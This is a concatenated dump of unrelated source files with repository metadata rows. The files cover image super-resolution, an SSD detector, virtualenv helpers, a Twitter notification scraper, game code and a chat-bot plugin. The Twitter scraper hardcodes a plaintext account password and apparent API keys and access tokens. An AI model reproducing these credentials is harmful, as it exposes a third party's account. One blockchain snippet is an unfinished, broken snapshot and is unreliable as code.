'group': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'indexCount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'lastChecked': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'blogsadmin.position': {
'Meta': {'object_name': 'Position'},
'bingExtendedInfo': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'bingMaxPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'bingMaxPositionDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'bingPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'blog': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blogsadmin.Blog']"}),
'bulkAddKeywords': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'googleExtendedInfo': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'googleMaxPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'googleMaxPositionDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'googlePosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'group': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'lastChecked': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'yahooExtendedInfo': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'yahooMaxPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'yahooMaxPositionDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'yahooPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['blogsadmin']
|
[
"[email protected]"
] | |
47a97ab6d8d5f5548aebdd21309a93628a5ddc13
|
b9deb23923e6b4625ef04993b66d912594815a4c
|
/sftgan_handler.py
|
0211a66576337831f7602d0c65fc1e05907207de
|
[] |
no_license
|
previtus/SuperSuperSuperResolution
|
4491ae9ab9269a0be9a3fc5a3d47a5b72b09f5b0
|
98ef3017bcf1da4f73bedb29574d00af8f895cab
|
refs/heads/master
| 2021-11-18T20:01:27.757712 | 2021-09-17T13:22:35 | 2021-09-17T13:22:35 | 253,820,324 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,176 |
py
|
import os
import glob
import numpy as np
import cv2
import torch
import torchvision.utils
from os import listdir
from os.path import isfile, join
import sys
sys.path.append(r'SFTGAN/pytorch_test/')
#from SFTGAN.pytorch_test import architectures as arch
#from SFTGAN.pytorch_test import util as util
import architectures as arch
import util
def sftgan(load_name="", save_name = 'fin_rlt.png', mode = 'rgb', override_input = False):
path = load_name
test_img_folder_name = "TMP1"
# options
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
device = torch.device('cuda') # if you want to run on CPU, change 'cuda' -> 'cpu'
# device = torch.device('cpu')
# make dirs
test_img_folder = 'SFTGAN/data/' + test_img_folder_name # HR images
save_prob_path = 'SFTGAN/data/' + test_img_folder_name + '_segprob' # probability maps
save_byteimg_path = 'SFTGAN/data/' + test_img_folder_name + '_byteimg' # segmentation annotations
save_colorimg_path = 'SFTGAN/data/' + test_img_folder_name + '_colorimg' # segmentaion color results
util.mkdirs([save_prob_path, save_byteimg_path, save_colorimg_path])
test_prob_path = 'SFTGAN/data/' + test_img_folder_name + '_segprob' # probability maps
save_result_path = 'SFTGAN/data/' + test_img_folder_name + '_result' # results
util.mkdirs([save_result_path])
# load model
seg_model = arch.OutdoorSceneSeg()
seg_model_path = 'SFTGAN/pretrained_models/segmentation_OST_bic.pth'
seg_model.load_state_dict(torch.load(seg_model_path), strict=True)
seg_model.eval()
seg_model = seg_model.to(device)
# look_up table, RGB, for coloring the segmentation results
lookup_table = torch.from_numpy(
np.array([
[153, 153, 153], # 0, background
[0, 255, 255], # 1, sky
[109, 158, 235], # 2, water
[183, 225, 205], # 3, grass
[153, 0, 255], # 4, mountain
[17, 85, 204], # 5, building
[106, 168, 79], # 6, plant
[224, 102, 102], # 7, animal
[255, 255, 255], # 8/255, void
])).float()
lookup_table /= 255
print('Testing segmentation probability maps ...')
"""
for idx, path in enumerate(glob.glob(test_img_folder + '/*')):
imgname = os.path.basename(path)
basename = os.path.splitext(imgname)[0]
if "txt" in path:
continue
"""
idx = 0
if True:
#print(idx + 1, basename, path)
print(idx + 1)
# read image
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
img = util.modcrop(img, 8)
print("debug ", img.shape, img.ndim, )
if img.ndim == 2:
img = np.expand_dims(img, axis=2)
if mode == 'bw':
#print(img.shape) # w,h,3 <- 1
stacked_img = np.stack((img,)*3, axis=2) # bw -> rgb
stacked_img = stacked_img[:,:,:,0]
#print(stacked_img.shape) # w,h,3 <- 1
img = stacked_img
#(424, 1024, 3)
#print("debug img", img.shape, )
if override_input:
print("overriding input ", img.shape, "as", path)
util.save_img(img, path)
img = torch.from_numpy(np.transpose(img, (2, 0, 1))).float()
# MATLAB imresize
# You can use the MATLAB to generate LR images first for faster imresize operation
img_LR = util.imresize(img / 255, 1 / 4, antialiasing=True)
img = util.imresize(img_LR, 4, antialiasing=True) * 255
img[0] -= 103.939
img[1] -= 116.779
img[2] -= 123.68
img = img.unsqueeze(0)
img = img.to(device)
with torch.no_grad():
output = seg_model(img).detach().float().cpu().squeeze()
# save segmentation probability maps
#torch.save(output, os.path.join(save_prob_path, basename + '_bic.pth')) # 8xHxW
SEG_OUT = output
"""
# save segmentation byte images (annotations)
_, argmax = torch.max(output, 0)
argmax = argmax.squeeze().byte()
cv2.imwrite('foo1.png', argmax.numpy())
# save segmentation colorful results
im_h, im_w = argmax.size()
color = torch.FloatTensor(3, im_h, im_w).fill_(0) # black
for i in range(8):
mask = torch.eq(argmax, i)
color.select(0, 0).masked_fill_(mask, lookup_table[i][0]) # R
color.select(0, 1).masked_fill_(mask, lookup_table[i][1]) # G
color.select(0, 2).masked_fill_(mask, lookup_table[i][2]) # B
# void
mask = torch.eq(argmax, 255)
color.select(0, 0).masked_fill_(mask, lookup_table[8][0]) # R
color.select(0, 1).masked_fill_(mask, lookup_table[8][1]) # G
color.select(0, 2).masked_fill_(mask, lookup_table[8][2]) # B
torchvision.utils.save_image(
color, 'foo2.png', padding=0, normalize=False)
"""
del seg_model
'''
Codes for testing SFTGAN
'''
# options
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
sres_model_path = 'SFTGAN/pretrained_models/SFTGAN_torch.pth' # torch version
# sres_model_path = 'SFTGAN/pretrained_models/SFTGAN_noBN_OST_bg.pth' # pytorch version
device = torch.device('cuda') # if you want to run on CPU, change 'cuda' -> 'cpu'
# device = torch.device('cpu')
if 'torch' in sres_model_path: # torch version
model = arch.SFT_Net_torch()
else: # pytorch version
model = arch.SFT_Net()
model.load_state_dict(torch.load(sres_model_path), strict=True)
model.eval()
model = model.to(device)
print('Testing SFTGAN ...')
"""
for idx, path in enumerate(glob.glob(test_img_folder + '/*')):
imgname = os.path.basename(path)
basename = os.path.splitext(imgname)[0]
if "txt" in path:
continue
"""
if True:
path
#print(idx + 1, basename)
print(idx + 1)
# read image
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
img = util.modcrop(img, 8)
img = img * 1.0 / 255
if img.ndim == 2:
img = np.expand_dims(img, axis=2)
if mode == 'bw':
#print(img.shape) # w,h,3 <- 1
stacked_img = np.stack((img,)*3, axis=2) # bw -> rgb
stacked_img = stacked_img[:,:,:,0]
#print(stacked_img.shape) # w,h,3 <- 1
img = stacked_img
#(424, 1024, 3)
#print("debug img", img.shape, )
img = torch.from_numpy(np.transpose(img[:, :, [2, 1, 0]], (2, 0, 1))).float()
# MATLAB imresize
# You can use the MATLAB to generate LR images first for faster imresize operation
img_LR = util.imresize(img, 1 / 4, antialiasing=True)
img_LR = img_LR.unsqueeze(0)
img_LR = img_LR.to(device)
# read segmentation probability maps
#seg = torch.load(os.path.join(test_prob_path, basename + '_bic.pth'))
seg = SEG_OUT
seg = seg.unsqueeze(0)
# change probability
# seg.fill_(0)
# seg[:,5].fill_(1)
seg = seg.to(device)
with torch.no_grad():
output = model((img_LR, seg)).data.float().cpu().squeeze()
output = util.tensor2img(output)
util.save_img(output, save_name)
if __name__ == "__main__":
mypath = "superloop-sft/"
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
onlyfiles.sort()
last_file = onlyfiles[-1]
namelist = last_file.split("_")
int_num = int(namelist[0])
name = "_" + "_".join(namelist[1:])
print(name, int_num, "and last is", last_file, "from whole list of", onlyfiles)
path = mypath + last_file
print("opening", path)
print("=================================================================================================================")
loops = 100
print("Now looping for", loops)
for i in range(loops):
int_num += 1
save_as = "superloop-sft/"+str(int_num).zfill(6)+name
sftgan(load_name=path, save_name=save_as)
print('saved', save_as)
path = save_as
|
[
"[email protected]"
] | |
ecf372af2d6cf157af07fc00c931f935f1a252c8
|
696ac453ee30865980a9bd5a6fc25a1baa0f32ec
|
/ssd/models/ssd512.py
|
4aae987f027ee31be62081601a30161af0d183f9
|
[
"MIT"
] |
permissive
|
jjjkkkjjj/pytorch_SSD
|
b420f82c9be0de641b0da2100ee7f399b9d595bd
|
4082ea745e0ca3a95cf73a89d824cd11ceb7c180
|
refs/heads/master
| 2021-06-12T21:35:50.536971 | 2020-06-25T15:05:28 | 2020-06-25T15:05:28 | 254,406,062 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,406 |
py
|
from ..core.layers import *
from .base import SSDvggBase, SSDTrainConfig, SSDValConfig, load_vgg_weights
from ..core.boxes import *
from torch import nn
class SSD512(SSDvggBase):
def __init__(self, class_labels, input_shape=(512, 512, 3), batch_norm=False,
val_config=SSDValConfig(val_conf_threshold=0.01, vis_conf_threshold=0.6, iou_threshold=0.45, topk=200)):
"""
:param class_labels: list or tuple of str
:param input_shape: tuple, 3d and (height, width, channel)
:param batch_norm: bool, whether to add batch normalization layers
"""
### train_config ###
if not batch_norm:
train_config = SSDTrainConfig(class_labels=class_labels, input_shape=input_shape, batch_norm=batch_norm,
aspect_ratios=((1, 2), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2), (1, 2)),
classifier_source_names=('convRL4_3', 'convRL7', 'convRL8_2', 'convRL9_2', 'convRL10_2', 'convRL11_2', 'convRL12_2'),
addon_source_names=('convRL4_3',),
codec_means=(0.0, 0.0, 0.0, 0.0), codec_stds=(0.1, 0.1, 0.2, 0.2),
rgb_means=(0.485, 0.456, 0.406), rgb_stds=(0.229, 0.224, 0.225))
else:
train_config = SSDTrainConfig(class_labels=class_labels, input_shape=input_shape, batch_norm=batch_norm,
aspect_ratios=((1, 2), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2), (1, 2)),
classifier_source_names=('convBnRL4_3', 'convBnRL7', 'convBnRL8_2', 'convBnRL9_2', 'convBnRL10_2', 'convRLBn11_2', 'convRL12_2'),
addon_source_names=('convBnRL4_3',),
codec_means=(0.0, 0.0, 0.0, 0.0), codec_stds=(0.1, 0.1, 0.2, 0.2),
rgb_means=(0.485, 0.456, 0.406), rgb_stds=(0.229, 0.224, 0.225))
### layers ###
Conv2d.batch_norm = batch_norm
vgg_layers = [
*Conv2d.relu_block('1', 2, train_config.input_channel, 64),
*Conv2d.relu_block('2', 2, 64, 128),
*Conv2d.relu_block('3', 3, 128, 256, pool_ceil_mode=True),
*Conv2d.relu_block('4', 3, 256, 512),
*Conv2d.relu_block('5', 3, 512, 512, pool_k_size=(3, 3), pool_stride=(1, 1), pool_padding=1),
# replace last maxpool layer's kernel and stride
# Atrous convolution
*Conv2d.relu_one('6', 512, 1024, kernel_size=(3, 3), padding=6, dilation=6),
*Conv2d.relu_one('7', 1024, 1024, kernel_size=(1, 1)),
]
extra_layers = [
*Conv2d.relu_one('8_1', 1024, 256, kernel_size=(1, 1)),
*Conv2d.relu_one('8_2', 256, 512, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('9_1', 512, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('9_2', 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('10_1', 256, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('10_2', 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('11_1', 256, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('11_2', 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('12_1', 256, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('12_2', 128, 256, kernel_size=(4, 4), stride=(1, 1), padding=1),
# if batch_norm = True, error is thrown. last layer's channel == 1 may be caused
]
vgg_layers = nn.ModuleDict(vgg_layers)
extra_layers = nn.ModuleDict(extra_layers)
super().__init__(train_config, val_config, defaultBox=DBoxSSDOriginal(img_shape=input_shape,
scale_conv4_3=0.07, scale_range=(0.15, 0.9),
aspect_ratios=train_config.aspect_ratios),
vgg_layers=vgg_layers, extra_layers=extra_layers)
def load_vgg_weights(self):
if self.batch_norm:
load_vgg_weights(self, 'vgg16_bn')
else:
load_vgg_weights(self, 'vgg16')
|
[
"[email protected]"
] | |
669f9df4e9dd7d4445d619a9df31513eff7f9760
|
2aed68d1ee14eb3fc344fe1e0db99b20f0c9a166
|
/xnr/twitter/feedback_like.py
|
1eb22b5a4e7e5a77903c88e07cd9307c7264e97f
|
[] |
no_license
|
zhhhzhang/xnr1
|
a8ab151d99e74124eae2ec15c61281a32cb9ce8d
|
bfa621916c9a787bcdff4573a06d12056e25c556
|
refs/heads/master
| 2020-03-19T04:56:22.330912 | 2018-05-30T12:00:12 | 2018-05-30T12:00:12 | 135,883,486 | 0 | 1 | null | 2018-06-03T07:35:36 | 2018-06-03T07:35:35 | null |
UTF-8
|
Python
| false | false | 2,408 |
py
|
#!/usr/bin/env python
#encoding: utf-8
from launcher import Launcher
from Elasticsearch_tw import Es_twitter
import time
class Like():
def __init__(self, username, password, consumer_key, consumer_secret, access_token, access_secret):
self.launcher = Launcher(username, password, consumer_key, consumer_secret, access_token, access_secret)
self.driver = self.launcher.login()
self.es = Es_twitter()
self.api = self.launcher.api()
self.driver.get('https://twitter.com/i/notifications')
time.sleep(2)
self.lis = self.driver.find_elements_by_xpath('//li[@data-item-type="activity"]')
self.list = []
self.update_time = int(time.time())
def get_like(self):
try:
for li in self.lis:
type = li.get_attribute('data-component-context')
if type == "favorite_activity":
user_name = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/a/strong').text
screen_name = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/a').get_attribute('href').replace('https:twitter.com/','')
timestamp = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/div[1]/div/span').get_attribute('data-time')
user_id = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/a').get_attribute('data-user-id')
root_user_id = li.find_element_by_xpath('./div/div/div/div[2]/div[2]/div/div/div').get_attribute('data-user-id')
root_content = li.find_element_by_xpath('./div/div/div/div[2]/div[2]/div/div/div/div/div/div[2]').text
mid = li.get_attribute('data-item-id')
photo_url = li.find_element_by_xpath('./div/div/div/div[2]//img').get_attribute('src')
item = {
'uid':user_id,
'photo_url':photo_url,
'user_name':screen_name,
'nick_name':user_name,
'timestamp':int(timestamp),
'text':root_content,
'update_time':self.update_time,
'root_text':root_content,
'root_mid':mid
}
self.list.append(item)
finally:
self.driver.close()
return self.list
def save(self,indexName,typeName,list):
self.es.executeES(indexName,typeName,list)
if __name__ == '__main__':
like = Like('[email protected]', 'zyxing,0513', 'N1Z4pYYHqwcy9JI0N8quoxIc1', 'VKzMcdUEq74K7nugSSuZBHMWt8dzQqSLNcmDmpGXGdkH6rt7j2', '943290911039029250-yWtATgV0BLE6E42PknyCH5lQLB7i4lr', 'KqNwtbK79hK95l4X37z9tIswNZSr6HKMSchEsPZ8eMxA9')
list = like.get_like()
print(list)
#like.save('twitter_feedback_like','text',list)
|
[
"[email protected]"
] | |
0375651712e4ca4f0a688682437e8c6a0263b53c
|
55c24645dd63a1c41037dcfb9fb45bc7bcdea4be
|
/venv/lib/python3.7/site-packages/virtualenv/info.py
|
d93b549be167f5959986545dde548e4456d6340c
|
[] |
no_license
|
abdullah-nawaz/flask-boilerplate
|
7c42801a21ee3e6a647cc8a7d92e0285f8e86cad
|
01bc7fe1140e8ec613de4a38546a07ddfbdbd254
|
refs/heads/master
| 2022-12-02T05:06:08.297759 | 2020-06-24T21:36:32 | 2020-06-24T21:36:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,957 |
py
|
from __future__ import absolute_import, unicode_literals
import logging
import os
import platform
import sys
import tempfile
IMPLEMENTATION = platform.python_implementation()
IS_PYPY = IMPLEMENTATION == "PyPy"
IS_CPYTHON = IMPLEMENTATION == "CPython"
PY3 = sys.version_info[0] == 3
PY2 = sys.version_info[0] == 2
IS_WIN = sys.platform == "win32"
ROOT = os.path.realpath(
os.path.join(os.path.abspath(__file__), os.path.pardir, os.path.pardir)
)
IS_ZIPAPP = os.path.isfile(ROOT)
WIN_CPYTHON_2 = IS_CPYTHON and IS_WIN and PY2
_CAN_SYMLINK = _FS_CASE_SENSITIVE = _CFG_DIR = _DATA_DIR = None
def fs_is_case_sensitive():
global _FS_CASE_SENSITIVE
if _FS_CASE_SENSITIVE is None:
with tempfile.NamedTemporaryFile(prefix="TmP") as tmp_file:
_FS_CASE_SENSITIVE = not os.path.exists(tmp_file.name.lower())
logging.debug(
"filesystem is %scase-sensitive", "" if _FS_CASE_SENSITIVE else "not "
)
return _FS_CASE_SENSITIVE
def fs_supports_symlink():
global _CAN_SYMLINK
if _CAN_SYMLINK is None:
can = False
if hasattr(os, "symlink"):
if IS_WIN:
with tempfile.NamedTemporaryFile(prefix="TmP") as tmp_file:
temp_dir = os.path.dirname(tmp_file.name)
dest = os.path.join(temp_dir, "{}-{}".format(tmp_file.name, "b"))
try:
os.symlink(tmp_file.name, dest)
can = True
except (OSError, NotImplementedError):
pass
logging.debug("symlink on filesystem does%s work", "" if can else " not")
else:
can = True
_CAN_SYMLINK = can
return _CAN_SYMLINK
__all__ = (
"IS_PYPY",
"IS_CPYTHON",
"PY3",
"PY2",
"IS_WIN",
"fs_is_case_sensitive",
"fs_supports_symlink",
"ROOT",
"IS_ZIPAPP",
"WIN_CPYTHON_2",
)
|
[
"[email protected]"
] | |
c385ced724613b09d739b2c164df6dc0a7c9fb32
|
6fe8250e67e46808a0f297abd38b49f65050336d
|
/tests/integration/__init__.py
|
13b945a3c4201a757520391da34446dd3f96baf2
|
[] |
no_license
|
pitymaia/pluserable
|
854fb6f220e744de87126f6a3e6429f8d1c60546
|
7a7656e66c894bc7981d6193354357014b3307c3
|
refs/heads/master
| 2020-08-31T08:37:45.917498 | 2019-10-22T20:23:17 | 2019-10-22T20:23:17 | 218,649,739 | 0 | 0 | null | 2019-10-31T00:09:41 | 2019-10-31T00:09:40 | null |
UTF-8
|
Python
| false | false | 1,152 |
py
|
"""An integration test goes through several layers of production code.
It accesses a database, so it is slower than a unit test.
"""
from bag.sqlalchemy.tricks import SubtransactionTrick
from kerno.web.pyramid import IKerno
from pyramid import testing
from sqlalchemy.orm import sessionmaker
from tests import AppTestCase, _make_eko
class IntegrationTestBase(AppTestCase):
"""Enclose each test in a subtransaction and roll it back."""
def setUp(self):
"""Set up each test."""
self.subtransaction = SubtransactionTrick(
engine=self.engine, sessionmaker=sessionmaker)
self.sas = self.subtransaction.sas # TODO REMOVE
def sas_factory():
return self.subtransaction.sas
self.kerno = _make_eko(sas_factory=sas_factory).kerno
self.repo = self.kerno.new_repo()
config = testing.setUp(settings=self.settings)
config.registry.registerUtility(self.kerno, IKerno)
config.include('pluserable')
self.config = config
def tearDown(self):
"""Clean up after each test."""
testing.tearDown()
self.subtransaction.close()
|
[
"[email protected]"
] | |
40a96d6da20ca24cb48bf2ecfa5d1d8e91736e5c
|
787ca5f82814a58c63cf3d8c0ec02082c40420de
|
/sbfury/golpe.py
|
44f94c69909c812085dd0cff319e7226e67c4fad
|
[] |
no_license
|
hugoruscitti/sbfury
|
72e586354b7cb88532bcfbe5705a66b1008710cb
|
474ce8304c45e63214184cde50f2976724fd8455
|
refs/heads/master
| 2020-06-29T19:03:25.284388 | 2013-01-02T04:15:09 | 2013-01-02T04:15:09 | 4,811,263 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,851 |
py
|
# -*- encoding: utf-8 -*-
# Shaolin's Blind Fury
#
# Copyright: Hugo Ruscitti
# Web: www.losersjuegos.com.ar
import pilas
from configuracion import DEPURACION
import efecto_golpe
import random
class Golpe(pilas.actores.Actor):
"""Representa un golpe (invisible) que un actor emite a otro."""
def __init__(self, actor, enemigos, dx, dy):
pilas.actores.Actor.__init__(self)
self.imagen = 'colision.png'
self.actor = actor
self.dx = dx
self.dy = dy
self.enemigos = enemigos
self.actualizar()
def actualizar(self):
if self.actor.espejado:
self.x = self.actor.x - 70 - self.dx
else:
self.x = self.actor.x + 70 + self.dx
self.y = self.actor.y + self.actor.altura_del_salto + self.dy
def verificar_colisiones(self):
for enemigo in self.enemigos:
area = [
enemigo.izquierda + 10,
enemigo.derecha - 10,
enemigo.abajo,
enemigo.arriba,
]
if enemigo.puede_ser_golpeado:
# colisión horizontal y vertical de caja contra punto.
if area[0] < self.x < area[1] and area[2] < self.y < area[3]:
# verificando que están casi en el mismo plano z.
if abs(enemigo.y - self.actor.y) < 15:
if enemigo.altura_del_salto < 80:
self.crear_efecto_de_golpe()
return enemigo
def dibujar(self, aplicacion):
if DEPURACION:
pilas.actores.Actor.dibujar(self, aplicacion)
def crear_efecto_de_golpe(self):
dx = random.randint(-10, 10)
dy = random.randint(-10, 10)
efecto_golpe.EfectoGolpe(self.x + dx, self.y + dy)
|
[
"[email protected]"
] | |
01509e3cb94f4932fe35bb4db8fbf15445461508
|
81eceea57d570fa1f9f6468875b1b06b8de9f0f0
|
/.history/block_20200624172716.py
|
ca5c135349d1728a51d30bcf28a737626975d11e
|
[] |
no_license
|
digg2414/python-blockchain
|
fe9cdab754123eddef660c39ffb4c0c6b0e99523
|
36c4df03bdd71dbd58663ee4b16f6a72f02d401f
|
refs/heads/master
| 2022-11-05T01:08:44.229492 | 2020-06-24T23:11:41 | 2020-06-24T23:11:41 | 274,786,987 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 841 |
py
|
import time
def mine_block(last_block, data):
"""
Mine a block based on the last_block and the data.
"""
times_stamp
class Block():
"""
Block: a unit of storage.
Store transactions in a blockchain that supports a cryptocurrency.
"""
def __init__(self, timestamp, last_hash ,data, hash):
self.data = data
self.timestamp = timestamp
self.last_hash = last_hash
self.hash = hash
def __repr__(self):
return (
'Block: ('
f'timestamp: {self.timestamp}, '
f'last_hash: {self.last_hash}, '
f'hash: {self.hash}, '
f'data: {self.data}'
)
def main():
block = Block('foo')
print(block)
print(f'block.py __name__: {__name__}')
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f5f7b157ea9d5a2354c0805cea334cfac3408e7b
|
0a4031c062c098811c3b419b94ccf96724439107
|
/json-quiz/3.py
|
3792c2d4d8cd12eef82fce1a96bcc06d32b59ffc
|
[] |
no_license
|
dflatow/compjour-hw
|
d934ac6b9d22ca923100d023809fa32103e8e74a
|
4a26854769c31536247acb41b35f32fb55ab1e59
|
refs/heads/master
| 2020-05-05T03:17:49.699470 | 2015-06-02T02:15:55 | 2015-06-02T02:15:55 | 33,497,085 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
import requests
import json
data_url = "http://www.compjour.org/files/code/json-examples/maps.googleapis-geocode-mcclatchy.json"
# fetch the data file
response = requests.get(data_url)
text = response.text
# parse the data
data = json.loads(text)
print('A.', data['results'][0]['formatted_address'])
print('B.', data['status'])
print('C.', data['results'][0]['geometry']['location_type'])
print('D.', data['results'][0]['geometry']['location']['lat'])
print('E.', data['results'][0]['geometry']['viewport']['southwest']['lng'])
num_to_print = 2
sep = ', '
print('F.', sep.join([x['long_name'] for x in data['results'][0]['address_components'][:num_to_print]]))
|
[
"[email protected]"
] | |
a8777de0fff2f753f2a10440eda5dc07631663cd
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/dataflow/stream/handlers/dataflow_yaml_execute_log.py
|
ec10a68c37c3a15e1547efc90d0f256f3089bb28
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 |
NOASSERTION
| 2022-04-02T10:30:56 | 2021-06-29T06:10:01 |
Python
|
UTF-8
|
Python
| false | false | 1,629 |
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from dataflow.stream.models import DataFlowYamlExecuteLog
def get(task_id):
return DataFlowYamlExecuteLog.objects.get(id=task_id)
def create(**kwargs):
return DataFlowYamlExecuteLog.objects.create(**kwargs)
|
[
"[email protected]"
] | |
a5f0b3191bcadf185372843a5c817ae11372a54b
|
146db0a1ba53d15ab1a5c3dce5349907a49217c3
|
/omega_miya/plugins/nbnhhsh/__init__.py
|
7866c153d40576e1b4b45923a629b974818a5e08
|
[
"Python-2.0",
"MIT"
] |
permissive
|
hailong-z/nonebot2_miya
|
84d233122b2d785bfc230c4bfb29326844700deb
|
7d52ef52a0a13c5ac6519199e9146a6e3c80bdce
|
refs/heads/main
| 2023-03-26T14:59:31.107103 | 2021-03-09T17:01:08 | 2021-03-09T17:01:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,827 |
py
|
import re
from nonebot import on_command, export, logger
from nonebot.typing import T_State
from nonebot.adapters.cqhttp.bot import Bot
from nonebot.adapters.cqhttp.event import GroupMessageEvent
from nonebot.adapters.cqhttp.permission import GROUP
from omega_miya.utils.Omega_plugin_utils import init_export
from omega_miya.utils.Omega_plugin_utils import has_command_permission, permission_level
from .utils import get_guess
# Custom plugin usage text
__plugin_name__ = '好好说话'
__plugin_usage__ = r'''【能不能好好说话?】
拼音首字母缩写释义
**Permission**
Command & Lv.30
**Usage**
/好好说话 [缩写]'''
# Init plugin export
init_export(export(), __plugin_name__, __plugin_usage__)
# 注册事件响应器
nbnhhsh = on_command('好好说话', rule=has_command_permission() & permission_level(level=30), aliases={'hhsh', 'nbnhhsh'},
permission=GROUP, priority=20, block=True)
# 修改默认参数处理
@nbnhhsh.args_parser
async def parse(bot: Bot, event: GroupMessageEvent, state: T_State):
args = str(event.get_plaintext()).strip().lower().split()
if not args:
await nbnhhsh.reject('你似乎没有发送有效的参数呢QAQ, 请重新发送:')
state[state["_current_key"]] = args[0]
if state[state["_current_key"]] == '取消':
await nbnhhsh.finish('操作已取消')
@nbnhhsh.handle()
async def handle_first_receive(bot: Bot, event: GroupMessageEvent, state: T_State):
args = str(event.get_plaintext()).strip().lower().split()
if not args:
pass
elif args and len(args) == 1:
state['guess'] = args[0]
else:
await nbnhhsh.finish('参数错误QAQ')
@nbnhhsh.got('guess', prompt='有啥缩写搞不懂?')
async def handle_nbnhhsh(bot: Bot, event: GroupMessageEvent, state: T_State):
guess = state['guess']
if re.match(r'^[a-zA-Z0-9]+$', guess):
res = await get_guess(guess=guess)
if res.success() and res.result:
try:
data = dict(res.result[0])
except Exception as e:
logger.error(f'nbnhhsh error: {repr(e)}')
await nbnhhsh.finish('发生了意外的错误QAQ, 请稍后再试')
return
if data.get('trans'):
trans = str.join('\n', data.get('trans'))
msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
await nbnhhsh.finish(msg)
elif data.get('inputting'):
trans = str.join('\n', data.get('inputting'))
msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
await nbnhhsh.finish(msg)
await nbnhhsh.finish(f'没有找到{guess}的相关解释QAQ')
else:
await nbnhhsh.finish('缩写仅支持字母加数字, 请重新输入')
|
[
"[email protected]"
] | |
